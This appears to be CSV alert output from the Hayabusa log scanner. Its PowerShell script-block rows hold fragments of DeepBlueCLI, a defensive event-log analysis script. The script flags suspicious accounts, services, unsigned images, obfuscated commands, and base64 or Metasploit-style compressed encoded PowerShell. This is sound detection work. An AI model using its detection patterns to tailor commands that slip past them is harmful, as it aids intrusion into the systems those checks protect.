$filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.265 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent 
error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
